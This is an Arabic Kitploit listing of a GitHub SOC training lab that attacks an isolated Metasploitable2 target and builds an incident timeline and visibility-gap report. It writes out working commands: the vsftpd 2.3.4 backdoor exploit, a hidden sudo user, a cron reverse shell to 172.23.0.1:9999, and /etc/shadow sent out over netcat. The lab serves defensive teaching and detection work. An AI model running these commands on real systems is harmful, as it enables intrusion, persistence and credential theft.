Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
soc-investigation-lab — تحقيق شامل في SOC: سلسلة هجوم CVE-2011-2523، ربط السجلات متعددة المصادر، تقرير الحادثة — MITRE ATT&CK T1190 | Kitploit
أدوات/GitHubGitHub/mithileshan/soc-investigation-lab
الاستطلاعتحليل الثغرات الأمنيةالاستغلالالتحقيق الجنائي الرقميما بعد الاستغلالاختبار الاختراقاستخبارات التهديداتالتعلم والتعليمالاستجابة للحوادث

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
تحليل السجلات
مختبرات وتدريب عملي
GitHubmithileshan/soc-investigation-lab

soc-investigation-lab

تحقيق شامل في SOC: سلسلة هجوم CVE-2011-2523، ربط السجلات متعددة المصادر، تقرير الحادثة — MITRE ATT&CK T1190

عرض المستودع
15منذ 5 أشهرلم تتم المراجعة بعد

مختبر تحقيقات SOC متكامل

ينفّذ سلسلة هجوم كاملة من أربع مراحل (استطلاع ← استغلال ← ثبات ← تسريب بيانات) ضد Metasploitable2، ويجمع الأدلة في كل مرحلة، وينتج خطًا زمنيًا منظمًا للحادث وتقرير SOC — مما يُظهر التفكير المتزامن للمهاجم والمدافع.

MITRE ATT&CK T1190 MITRE ATT&CK T1136 MITRE ATT&CK T1078 MITRE ATT&CK T1041 Python


الهدف

هذا هو المشروع الختامي. يبيّن القدرة على:

  • تنفيذ سلسلة قتل واقعية ضد هدف معرّض للاختراق عن قصد
  • جمع أدلة جنائية في كل مرحلة باستخدام مصادر تيليمتري متعددة
  • ربط إدخالات السجلات من أنظمة متباينة في خط زمني موحد للحادث
  • إجراء تحليل فجوة الرؤية — لتحديد ما كان سيُفوَّت دون تغطية كشف مناسبة
  • إنتاج تقرير حادث بمستوى SOC بالتنسيق المستخدم من فرق الأمن الحقيقية

الاستغلال المستخدم (CVE-2011-2523 — الباب الخلفي في vsftpd 2.3.4) ذو أهمية تاريخية: فقد كان هجومًا على سلسلة التوريد حيث حقن خصم بابًا خلفيًا في مستودع المصدر المفتوح لحزمة vsftpd.


البنية المعمارية

                    ╔═══════════════════════════════╗
                    ║  soc-lab (172.23.0.0/24)       ║
                    ║                               ║
┌─────────────┐     ║  ┌─────────────────────────┐  ║
│  Attacker   │     ║  │  Metasploitable2        │  ║
│  Kali Linux │     ║  │  172.23.0.200           │  ║
│             │     ║  │                         │  ║
│  Phase 1    │─────╫─►│  :21  vsftpd 2.3.4 ◄───╫──╫── CVE-2011-2523
│  nmap -A    │     ║  │  :22  SSH               │  ║    backdoor on :6200
│             │     ║  │  :80  HTTP (DVWA)        │  ║
│  Phase 2    │─────╫─►│  :445 Samba             │  ║
│  msf exploit│◄────╫──│  :6200 root shell       │  ║
│             │     ║  └─────────────────────────┘  ║
│  Phase 3    │─────╫─► useradd sysbackup           ║
│  persistence│─────╫─► crontab reverse shell       ║
│             │     ║                               ║
│  Phase 4    │◄────╫── /etc/shadow via nc :5555    ║
│  exfiltration     ╚═══════════════════════════════╝
└──────┬──────┘
       │
       │ Evidence collection:
       │  logs/msf_session.log
       │  logs/target_auth.log
       │  captures/full_attack_chain.pcap (tshark CSV)
       ▼
┌──────────────────────────────────────────────────┐
│  build_timeline.py                               │
│  Parser: MSF log + auth.log + tshark CSV         │
│  → merge by timestamp → tag by phase             │
│  → JSON timeline + Markdown incident report      │
└──────────────────────────────────────────────────┘

الأدوات والتقنيات

الأداةالغرض
Metasploitable2هدف لينكس معرّض للاختراق عن قصد
Nmap 7.94المرحلة 1: تعداد الخدمات
Metasploit 6.xالمرحلة 2: استغلال vsftpd 2.3.4
Netcatالمرحلتان 3–4: الثبات وتسريب البيانات
tsharkالتقاط الحزم خلال جميع المراحل
Python 3build_timeline.py — دمج السجلات من مصادر متعددة
Splunk Free / ELKكشف SIEM خاص بكل مرحلة

الإعداد

cd docker/

# Start Metasploitable2 (isolated network)
docker compose up -d metasploitable

# Verify target is reachable
nmap -p 21,22,80 172.23.0.200

# Start background packet capture
sudo tcpdump -i eth0 host 172.23.0.200 \
    -w captures/full_attack_chain.pcap &

طريقة التشغيل (سلسلة الهجوم)

المرحلة 1 — الاستطلاع

nmap -sV -O -A \
    -p 21,22,80,139,445,3306,5432 \
    --script=banner,ftp-anon,http-title \
    -oX logs/recon_scan.xml \
    172.23.0.200

النتيجة الرئيسية: 21/tcp open ftp vsftpd 2.3.4

المرحلة 2 — الاستغلال (CVE-2011-2523)

# Method A: Metasploit
msfconsole -q -x "
  use exploit/unix/ftp/vsftpd_234_backdoor;
  set RHOSTS 172.23.0.200;
  set PAYLOAD cmd/unix/interact;
  run" | tee logs/msf_session.log

# Method B: Manual (demonstrates the mechanism)
# Step 1: Trigger backdoor by sending username with ':)'
printf "USER evil:)\r\nPASS x\r\n" | nc 172.23.0.200 21
# Step 2: Connect to spawned root shell
nc 172.23.0.200 6200
# → id: uid=0(root) gid=0(root)

لماذا يعمل هذا: عندما يتلقى vsftpd 2.3.4 اسم مستخدم يحتوي على السلسلة الفرعية :)، ينفّذ البرنامج الخفي execl("/bin/sh",...) مربوطًا بمنفذ TCP 6200. لا حاجة للمصادقة — غلاف جذر مباشر.

المرحلة 3 — الثبات

# Execute in the root shell on target:
useradd -m -s /bin/bash sysbackup
echo "sysbackup:$(openssl passwd -1 secr3t)" >> /etc/passwd
echo "sysbackup ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
(crontab -l 2>/dev/null; echo "* * * * * bash -i >& /dev/tcp/172.23.0.1/9999 0>&1") | crontab -

المرحلة 4 — تسريب البيانات

# Receiver (attacker)
nc -lvnp 5555 > samples/exfiltrated_shadow.txt

# Sender (on target)
cat /etc/shadow | nc 172.23.0.1 5555

بناء الخط الزمني للحادث

# Convert PCAP to CSV first
bash ../02-network-recon-detection/src/pcap_to_siem.sh captures/full_attack_chain.pcap

# Build timeline from all sources
python3 src/build_timeline.py \
    --msf-log  logs/msf_session.log \
    --auth-log logs/target_auth.log \
    --pcap-csv captures/full_attack_chain_packets.csv \
    --output-json samples/timeline.json \
    --output-md   docs/incident_report.md \
    --pretty

نموذج الإخراج

مخرجات build_timeline.py على stderr

2026-04-24T16:05:20  [INFO    ]  Parsed 9 events from MSF log
2026-04-24T16:05:20  [INFO    ]  Parsed 11 events from auth.log
2026-04-24T16:05:20  [INFO    ]  Parsed 4 flow-initiation events from PCAP CSV
2026-04-24T16:05:20  [INFO    ]  Total events (sorted): 24
2026-04-24T16:05:20  [INFO    ]  Unique IOCs extracted: 4
2026-04-24T16:05:20  [INFO    ]  Phase RECON   : 8 event(s)
2026-04-24T16:05:20  [INFO    ]  Phase EXPLOIT : 4 event(s)
2026-04-24T16:05:20  [INFO    ]  Phase PERSIST : 6 event(s)
2026-04-24T16:05:20  [INFO    ]  Phase EXFIL   : 2 event(s)

الخط الزمني للحادث (مقتطف من samples/sample_timeline.json)

{
  "total_events": 24,
  "iocs": [
    { "indicator": "172.23.0.1", "phase": "RECON",   "occurrence": 8 },
    { "indicator": "172.23.0.1", "phase": "EXPLOIT",  "occurrence": 2 },
    { "indicator": "sysbackup",  "phase": "PERSIST", "occurrence": 1 }
  ],
  "timeline": [
    { "timestamp": "2026-04-24T14:10:05+00:00", "phase": "RECON",   "description": "nmap -sV -O -A", "source": "metasploit" },
    { "timestamp": "2026-04-24T14:22:41+00:00", "phase": "EXPLOIT", "description": "session 1 opened (172.23.0.1 → 172.23.0.200)", "source": "metasploit" },
    { "timestamp": "2026-04-24T14:28:07+00:00", "phase": "PERSIST", "description": "useradd: new user: name=sysbackup", "source": "auth_log" },
    { "timestamp": "2026-04-24T14:35:52+00:00", "phase": "EXFIL",   "description": "flow 172.23.0.200 → 172.23.0.1:5555", "source": "pcap" }
  ]
}

تحليل فجوة الرؤية

هذا هو أهم مخرج تحليلي — ما كان سيُفوَّت دون كشف مناسب.

المرحلةأدلة السجلات الخامما يلتقطه قاعدة SIEMما يُفوَّت دون تغطية
الاستطلاعPCAP: فيضان SYN إلى 24 منفذًاقاعدة مسح المنافذ (>20 منفذًا/10 ثوانٍ) ✓الفحص البطيء (-T1): يتجاوز حد المعدل تمامًا
الاستغلالPCAP: اتصال جديد بالمنفذ :6200 · لا يوجد إدخال في auth.logقاعدة الشذوذ للمنفذ :6200 ✓إذا استخدم المهاجم استغلال HTTP على :80 — لا شذوذ في المنافذ
الثباتauth.log: new user: name=sysbackupتنبيه إنشاء مستخدم جديد ✓تعديل /etc/passwd مباشرةً: صفر تسجيل بدون auditd
تسريب البياناتPCAP: 4 كيلوبايت صادرة على المنفذ :5555قاعدة المنفذ غير القياسي + الحجم ✓تسريب عبر DNS (سجلات TXT): يتجاوز قواعد الحجم تمامًا
تنزيل الأداة